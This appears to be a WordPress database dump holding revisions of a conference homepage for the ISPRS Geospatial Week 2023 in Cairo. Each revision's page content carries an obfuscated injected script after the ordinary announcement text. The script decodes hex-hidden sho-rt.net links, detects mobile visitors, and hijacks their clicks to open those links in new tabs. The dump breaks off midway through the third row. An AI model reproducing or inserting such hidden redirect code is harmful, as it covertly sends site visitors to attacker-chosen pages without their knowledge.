(3087,1,'2022-11-08 21:58:56','2022-11-08 21:58:56','[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:58:56','2022-11-08 21:58:56','',3066,'https://gsw2023.com/?p=3087',0,'revision','',0),
(3088,1,'2022-11-08 22:01:10','2022-11-08 22:01:10','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icons][/ultimate_icons][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 22:01:10','2022-11-08 22:01:10','',3066,'https://gsw2023.com/?p=3088',0,'revision','',0),
(3089,1,'2022-11-08 22:03:02','2022-11-08 22:03:02','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Raleway|font_call:Raleway\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icons][single_icon icon=\"icomoon-fontawesome-16x16-calendar-alt\" icon_size=\"32\" icon_margin=\"5\" icon_color=\"#2139d3\"][/ultimate_icons][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3082\" img_size=\"799x452\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f